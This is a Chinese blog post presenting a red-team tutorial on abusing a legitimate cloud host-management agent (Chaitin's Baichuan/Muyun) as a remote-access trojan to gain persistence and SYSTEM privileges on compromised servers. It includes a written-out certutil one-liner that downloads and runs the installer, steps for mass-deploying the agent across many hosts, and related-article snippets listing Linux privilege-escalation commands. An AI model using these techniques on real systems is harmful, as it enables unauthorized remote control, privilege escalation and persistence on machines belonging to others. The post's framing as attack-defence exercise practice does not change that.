首页 > 其他分享 >实战攻防演练-利用长亭百川云平台上线远控提权

实战攻防演练-利用长亭百川云平台上线远控提权

时间:2023-10-24 23:22:55浏览次数:34  
标签:上线 百川 提权 主机 远控 长亭 installer 权限

前言

长亭百川云平台是北京长亭未来科技有限公司旗下的 SaaS 产品服务平台,专注于云安全解决方案。其提供牧云·主机管理助手、网站监测、牧云·云原生安全平台、雷池 Web 应用防火墙等一系列在线安全产品,帮助企业用户更轻松地治理云安全问题,使云上业务更加安全可靠。在使用中发现该产品可以用于攻防对抗中实战,其生成的客户端可是远程上线,获取到服务器主机任意权限,最后会提升至系统权限,适用于后渗透权限提升维持。

实战演示

网站地址:https://rivers.chaitin.cn
在开始使用长亭百川云服务之前,需要先注册一个百川云账号。有账号后可以在百川云登录

选择进入工作台,选择牧云主机管理助手

其中这里区分三个版本,基础版,体验版,付费版,具体如下所示,掏钱的肯定比不掏好用,看个人情况选择。

Windows上线木马

这里如下所示,windows主机需要浏览器下载后,使用其他命令运行

这里首先下载木马文件后上传至自己的网站服务器,使用certutil命令下载执行
certutil -urlcache -split -f http://127.0.0.1/installer.exe c:\installer.exe && start installer.exe
或者直接上传目标服务器运行 start installer.exe

服务端就会上线

配置信息

这里可以对上线主机进行查看基础配置,和文件管理操作

权限提升

如下,我们使用Administrator权限上线执行,牧云管理助手直接获取到系统权限,省去权限提升步骤

Linux上线木马

配置入上一致,linux直接复制命令后,在目标主机执行,详细操作类似于windows操作


详细配置

其他功能

可以执行管理查看docker服务

安全扫描功能可以检测主机漏洞风险,及常见漏洞等

应用市场可以下载各种软件

统一配置

推送命令模块可以对多主机群进行批量上线木马

批量命令执行

标签:上线,百川,提权,主机,远控,长亭,installer,权限
From: https://www.cnblogs.com/Yichensec/p/GF_ctbcy.html

相关文章

  • Linux提权
    Linux提权测试思路命令uname-a查看内核版本,searchsploit搜索一下内核版本查看有无内核漏洞命令sudo-l查看sudo提权cat/etc/crontab;利用find/-path/proc-prune-o-typef-perm-o+w2>/dev/null命令查看可写文件或目录利用find/-typef-perm-04000-ls......
  • 权限提升-Windows内核提权
    权限提升-Windows内核提权目录权限提升-Windows内核提权本节知识点系统内核溢出漏洞提权概述内核溢出提权步骤补丁对比法1.手动查找系统补丁2.对比查找系统潜在漏洞项目一:WindowsExploitSuggester项目二.WindowsVulnScan项目三wesng3.提权大集合项目地址:https://github.com/l......
  • 通过篡改cred结构体实现提权利用
    前言在之前的HeapOverflow文章中,作者还构造了任意地址读写的操作,使用了任意地址读写去进行提权,还挺有意思的,记录一下如何利用任意地址读写进行提权。作者利用任意地址读写分别改写modprobe_path以及cred结构体去实现提权的操作,由于改写modprobe_path的方法之前已经研究过了,因此......
  • 权限提升-MY&MS&ORA等SQL数据库提权
    Web提权本地提权皆可,核心是得到数据库的账号密码在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码除Access数据库外,其他数据库基本都存在数据库提权的可能流程:服务探针-信息收集-提权利用-获取......
  • 权限提升-win溢出漏洞AT&SC&ps提权
    #明确权限提升基础知识:权限划分#明确权限提升环境问题:WEB及本地#明确权限提升方法针对:针对方法适应问题#明确权限提升针对版本:个人及服务器版本;针对方法;#知识点必备:用户及用户组权限的划分;Windows提权命令windows权限认识(用户及用户组)Windows系统内置了许多本地......
  • 【原创】基于QT编写的支持IPv4/IPv6双协议栈,TCP/UDP双模式,DLL内存加载的模块化远控木
    本人已经本科毕业一年有余,在平常实习过程中,发现大佬都对我的本科毕设--双协议栈远控木马感兴趣。据我所知,目前流行的C2远控软件中,MSF支持IPv4和IPv6,但是MSF生成的单个木马只是支持其中的一种协议,而不是双协议栈。CobaltStrike目前尚无IPv6的使用案例。其他支持双协议栈的C2软件......
  • 基于Win32k内核提权漏洞的攻防对抗
    一、产生原因1.1Callback机制Win32k组件最初的设计和编写是完全建立的用户层上的,但是微软在WindowsNT4.0的改变中将Win32k.sys作为改变的一部分而引入,用以提升图形绘制性能并减少Windows应用程序的内存需求。窗口管理器(User)和图形设备接口(GDI)在极大程度上被移出客户端/......
  • Linux提权
    suid,sudo,脏牛提权基本信息:基础信息收集(1):内核,操作系统和设备信息uname-a打印所有可用的系统信息#去github找uname-r内核版本(2)用户和群组cat/etc/passwd列出系统上的所有用户cat/etc/shadow列出系统上的所有用户密码(3)用户和权限信息:whoami当前用户名id......
  • 长亭科技-网站监测
      前言上一次体验了长亭科技雷池waf社区版,今天给大家推荐一款网站监测工具,同样是长亭科技出品的良心产品。百川云平台-网站监测:网站监测-长亭百川云面向企业和技术爱好者(chaitin.cn)为什么需要网站监控和检测?网站监控和检测对于企业或个人保证网站正常运行非常重......
  • windows提权(下)
    权限提升:systeminfo看补丁官网找漏洞:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017payloads下载:https://github.com/SecWiki/windows-kernel-exploits这里用巴西烤肉:pr.exe新建用户:UAC提权:vista以后引入的安全机制,通过UAC,......